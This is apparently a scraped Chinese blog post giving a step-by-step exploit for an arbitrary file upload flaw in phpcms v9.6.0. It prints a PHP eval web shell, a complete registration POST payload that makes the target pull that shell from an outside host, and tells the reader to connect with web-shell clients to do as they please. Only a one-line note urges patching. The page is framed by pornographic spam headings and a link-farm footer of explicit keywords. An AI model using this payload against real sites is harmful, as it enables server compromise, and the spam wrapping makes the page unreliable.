日本搞逼视频_黄色一级片免费在线观看_色99久久_性明星video另类hd_欧美77_综合在线视频

國內最全IT社區平臺 聯系我們 | 收藏本站
阿里云優惠2
您當前位置:首頁 > 程序人生 > 隨筆 > phpcms v9.6.0任意文件上傳漏洞

phpcms v9.6.0任意文件上傳漏洞

來源:程序員人生   發布時間:2021-09-16 09:37:19 閱讀次數:6332次

經過親自測試,本漏洞只針對phpcmx V9.6有效

首先我們在服務器上上傳一個shell.txt一句話木門文件,內容為:

<?php @eval($_POST['wlsh']);?>

并且可以訪問:http://www.baidu.com/shell.txt

然后在目標網站注冊會員,打開burp,截斷數據包,把post內容更改為

siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info[content]=<img src=http://www.baidu.com/shell.txt?.php#.jpg>&dosubmit=1&protocol=

利用repeater模塊 查看回顯包  得到shell地址。

phpcms v9.6.0任意文件上傳漏洞

通過重新POST后,就可以看到自己上傳的木馬文件,

phpcms v9.6.0任意文件上傳漏洞

然后用中國蟻劍或者菜刀連接后,就可以為所欲為了

這個漏洞危害很大,建議盡快修復!

生活不易,碼農辛苦
如果您覺得本網站對您的學習有所幫助,可以手機掃描二維碼進行捐贈
程序員人生
------分隔線----------------------------
分享到:
------分隔線----------------------------
關閉
程序員人生
主站蜘蛛池模板: 精品国产免费久久久久久尖叫 | 97网站| 国产精品第一区 | 久久久午夜精品理论片中文字幕 | 日本精a在线观看 | 久久亚洲综合 | 97午夜| 久久久久久中文 | 免费黄色一级片 | 午夜久久精品 | 国产在视频一区二区三区吞精 | 天堂av在线电影 | 一本一本久久a久久精品牛牛影视 | 成人看片| 国产精品久久久久久久久久久久久久 | 日韩av在线免费播放 | 亚洲 精品 综合 精品 自拍 | 欧美三区在线观看 | 亚洲第一视频网站 | 国产精品午夜一区二区欲梦 | 成人午夜毛片 | 大毛片 | 日韩三级网址 | 黄色一毛片 | 91精品国产色综合久久不卡98口 | 久久精品国产精品亚洲 | 九九精品久久 | 99精品国产高清在线观看 | 自拍欧美亚洲 | 亚洲综合在线视频 | 人人干人人看 | 一区二区在线电影 | 国产经典一区二区三区 | 久久精品1 | 精品无码久久久久久国产 | 国产日本亚洲香蕉视频 | 色av吧| 亚洲视频在线观看视频 | 黄色毛片免费看 | 国产69精品久久久久毛片 | 麻豆成人久久精品二区三区小说 |